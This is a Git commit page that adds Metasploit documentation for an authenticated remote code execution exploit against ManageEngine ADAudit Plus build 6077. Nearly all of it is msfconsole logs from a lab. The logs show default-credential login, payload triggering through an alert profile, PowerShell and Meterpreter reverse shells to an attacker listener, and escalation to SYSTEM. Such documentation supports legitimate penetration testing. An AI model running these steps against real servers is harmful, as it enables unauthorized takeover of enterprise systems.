adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions 9 Packages Projects Releases Wiki Activity

Add in ADAudit Plus build 6077 testing examples

Browse Source
This commit is contained in:
Grant Willcox
2023-05-08 11:45:44 -05:00
parent b8856bbb87
commit c221edb1ec
1 changed files with 205 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/windows/http/manageengine_adaudit_plus_authenticated_rce.md
+205
View File
@@ -165,3 +165,208 @@ PS C:\Program Files\ManageEngine\ADAudit Plus\bin>whoami
lies\administrator
PS C:\Program Files\ManageEngine\ADAudit Plus\bin>
```
### ManageEngine ADAudit Plus build 6077 running on Windows Server 2022 - Powershell Payload
```
msf6 > use exploit/windows/http/manageengine_adaudit_plus_authenticated_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set RHOSTS 192.168.204.132
RHOSTS => 192.168.204.132
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set LHOST 192.168.204.128
LHOST => 192.168.204.128
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > show options
Module options (exploit/windows/http/manageengine_adaudit_plus_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTH_DOMAIN ADAuditPlus Authentication yes ADAudit Plus authentication domain (default is ADAuditPlus Authentication)
PASSWORD admin yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.204.132 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8081 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to ManageEngine ADAudit Plus
USERNAME admin yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (cmd/windows/powershell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.128 yes The listen address (an interface may be specified)
LOAD_MODULES no A list of powershell modules separated by a comma to download over the web
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Command
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > check
[*] Using configured authentication domain alias DAFOREST.
[*] Attempting to authenticate to ADAuditPlus Authentication with username: admin and password: admin
[*] Found 1 configured domain(s): daforest.com
[+] Successfully authenticated
[*] 192.168.204.132:8081 - The target appears to be vulnerable. The target is ADAudit Plus 6077
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > exploit
[*] Started reverse TCP handler on 192.168.204.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using configured authentication domain alias DAFOREST.
[*] Attempting to authenticate to ADAuditPlus Authentication with username: admin and password: admin
[*] Found 1 configured domain(s): daforest.com
[+] Successfully authenticated
[+] The target appears to be vulnerable. The target is ADAudit Plus 6077
[*] Attempting to create an alert profile
[+] Successfully created alert profile fw4hKcxDG
[*] Attempting to trigger the payload via an authentication attempt for domain DAFOREST using incorrect credentials.
[*] Received expected reply when trying to trigger the payload. Let's hope we get a shell...
[*] Powershell session session 2 opened (192.168.204.128:4444 -> 192.168.204.132:62845) at 2023-05-04 19:42:57 -0500
[*] Powershell session session 1 opened (192.168.204.128:4444 -> 192.168.204.132:62844) at 2023-05-04 19:42:57 -0500
[*] Attempting to delete alert profile fw4hKcxDG
[+] Successfully deleted alert profile fw4hKcxDG
PS C:\Program Files\ManageEngine\ADAudit Plus\bin> whoami
daforest\administrator
PS C:\Program Files\ManageEngine\ADAudit Plus\bin> ^X^Z
Background session 2? [y/N] y
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 powershell windows Administrator @ WIN-BRSHGJGIDFM 192.168.204.128:4444 -> 192.168.204.132:62844 (192.168.204.132)
2 powershell windows Administrator @ WIN-BRSHGJGIDFM 192.168.204.128:4444 -> 192.168.204.132:62845 (192.168.204.132)
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) >
```
### ManageEngine ADAudit Plus build 6077 running on Windows Server 2022 - Meterpreter Payload
```
msf6 > use exploit/windows/http/manageengine_adaudit_plus_authenticated_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set RHOSTS 192.168.204.132
RHOSTS => 192.168.204.132
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set LHOST 192.168.204.128
LHOST => 192.168.204.128
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > show options
Module options (exploit/windows/http/manageengine_adaudit_plus_authenticated_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
AUTH_DOMAIN ADAuditPlus Authentication yes ADAudit Plus authentication domain (default is ADAuditPlus Authentication)
PASSWORD admin yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.204.132 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8081 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to ManageEngine ADAudit Plus
USERNAME admin yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (cmd/windows/powershell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.204.128 yes The listen address (an interface may be specified)
LOAD_MODULES no A list of powershell modules separated by a comma to download over the web
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Command
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set payload cmd/windows/powershell/x64/meterpreter/reverse_tcp
payload => cmd/windows/powershell/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > exploit
[*] Started reverse TCP handler on 192.168.204.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using configured authentication domain alias DAFOREST.
[*] Attempting to authenticate to ADAuditPlus Authentication with username: admin and password: admin
[*] Found 1 configured domain(s): daforest.com
[+] Successfully authenticated
[+] The target appears to be vulnerable. The target is ADAudit Plus 6077
[*] Attempting to create an alert profile
[+] Successfully created alert profile iEQnR24qE9n1
[*] Attempting to trigger the payload via an authentication attempt for domain DAFOREST using incorrect credentials.
[*] Received expected reply when trying to trigger the payload. Let's hope we get a shell...
[*] Sending stage (200774 bytes) to 192.168.204.132
[*] Sending stage (200774 bytes) to 192.168.204.132
[-] Failed to load extension: uninitialized constant Rex::Post::Meterpreter::Extensions::Stdapi::Stdapi
WARNING: Local file /home/gwillcox/git/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[!] If the client portion of stdapi or priv fails to load, you can do so manually via 'load stdapi' and/or load priv'
[*] Meterpreter session 4 opened (192.168.204.128:4444 -> 192.168.204.132:62858) at 2023-05-04 19:45:48 -0500
[*] Attempting to delete alert profile iEQnR24qE9n1
[*] Meterpreter session 3 opened (192.168.204.128:4444 -> 192.168.204.132:62857) at 2023-05-04 19:45:48 -0500
[+] Successfully deleted alert profile iEQnR24qE9n1
meterpreter > load stdapi
Loading extension stdapi...Success.
meterpreter > load priv
[!] The "priv" extension has already been loaded.
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > getuid
Server username: DAFOREST\Administrator
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeMachineAccountPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```